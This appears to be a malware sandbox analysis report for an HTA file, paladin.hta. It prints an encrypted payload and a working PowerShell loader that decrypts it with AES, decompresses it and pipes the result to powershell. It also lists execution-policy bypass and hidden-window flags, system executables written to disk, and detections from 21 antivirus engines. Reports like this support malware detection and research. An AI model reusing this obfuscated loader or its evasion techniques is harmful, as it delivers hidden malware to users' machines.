vYDLdm2fuOEZ6jf+7NOH9ikGegSRoZVpVTsrecrccgaFsZBXlqZOXBeoCATFmIePE5ZS0fSjXPZ1cX1N95UuOpueTESHvfgvghi+EGsJuP7w8WZHaGaiSNz3uDYNMznombCvH0MOttfo6ZH6pEIdpC0b2VR/aRO4xUiwPJwbNhQKJG2aAZASBOvXqB/yyjr/lgI9P7OpmTOTuNkX1PirZOCRXhV15Y7iKZVyVH9BuYE3yfyTqh2FirNVG44AKRVVtQyjY8hFghorYNpEDtBW5M48BJHgp/kGDK103MA1gpxURYWDesSO1ngs7UPhpBzd4KgDe0/M7c6r7+/A3RymIjmLFGsb9ssxItoctYx0KgQgN/gTMlyJ1l3uy/lRwqpV5RGTrYmOua9jg1TK0EQZztXthH1+lcNiGk8CnpdSpbNR5bTSzdVvu8C/LdM0IzA0+0b3TNNieyIdJPSdQj7eumvd6KsIT6NEMYrNnQ8NWW+Th9uQ2mCfxQzjmsHZP+pPl2R6TLxcCBQ31PvGBz3+Z0MPDP3YudqzqmtA5uiuuZAuOWRae63RJpLtFqAKK2CAS70x+LMIzgX5mHb5e/HBcJTT5lYuyyehgmAYvUEp7tzBiGXz0yziRHmwN9gkRcm/42C8QaguP+I217vsHER/jZOH/Cb6LeQTPXJclXbBi7DD+6Vd5M487qZyzPL9N9gCktFwyvYZIZyBGYH/rPFCwScBD36BinpLmOp7SuA9QQm/XfWxjRvWO8KN9OL21izaDyKLA1xnRF3roThMHg7Co19pTT7B8xQ2bumuP70rOGoZI+mNy6MncK4r1DW5Ct9uQPAwVNf2XW+qeY5T7kRhQq5QoBOX5lM6DPk6v7PKwFPJYzkEpVhjJ2tE7YS5LMJ9jJfTTdxA4SRvJvJkr4GB3KdeGvSsPDv7sR6FZoZ0ejg0eGsU3JeN7rm3pG+Y3gqVeNWDKUp5BehNAqp+QByozRbYdR0pbgmEMalLOgsRz0AOFbrmqZjZ9oyXO5Pcb7+em+7UtlX24jHRws6NV9lFRwFi8catLcm9ZWZrhsAY9bIi2WDaFfAjIvT8iynAt+3pXnmogEphPG8zLk+dQvFIpU39m30arG/OZ5ms66QMczLjeX/r41o0KT5z7PO3EK/Bym6SsT0rYwHjnT0wuIp0lM3fqH85KuNQ6OC6kWO/HuJDB7+oPqTAg+P1OfSh1IROLRt6uPLjz4fcKph5Nb30xH7SjDHahdStmpoaQCt++BGcQMbX89tZo7w8NFIqBLQeOyVtJNRQvxbKA5hORWN9ARRdwHWeB2I78X/Qzx3EVozaJDBh7za9UY+0+DEqJ1nFoiN+sfEytGepOpKz2A76ymbCWznZCcLrGlyd1C01h7r+Jd4mZp8qVGfLU5fe+7VRPNPs5le9qmSM4cKP5sBe4DhZGZ60DrC6oOTWFLa172ymLasXyxfASMMEXZ4iWXr59lwjqPirFMahDCwi1jbcOQ9b5aGBMlJZIGdeEDJvOwz66ZeXH6MRIy8WvsegJaWb3V8NLequguv3DsLi5Jh6aSv2cnufbeIKbpMr';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG \| powershell -

Creates a suspicious Powershell process (4 events)

option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 21 AntiVirus engines on VirusTotal as malicious (21 events)

Lionic	Trojan.HTML.Generic.4!c
ESET-NOD32	VBS/Kryptik.D
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	VBS:Electryon.308
NANO-Antivirus	Trojan.Script.Dinihou.dnzdga
MicroWorld-eScan	VBS:Electryon.308
Tencent	Script.Trojan.Generic.Fwnw
VIPRE	VBS:Electryon.308
McAfee-GW-Edition	BehavesLike.HTML.Dropper.cr
FireEye	VBS:Electryon.308
Emsisoft	VBS:Electryon.308 (B)
Arcabit	VBS:Electryon.308
GData	VBS:Electryon.308
Google	Detected
VBA32	suspected of VBS.EncodedMalware
ALYac	VBS:Electryon.308
Rising	Trojan.Kryptik/VBS!8.133D6 (TOPIS:E0:SBSejaxyQZM)
MAX	malware (ai score=80)
Fortinet	VBS/Kryptik.D!tr
AVG	Other:Malware-gen [Trj]

paladin.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All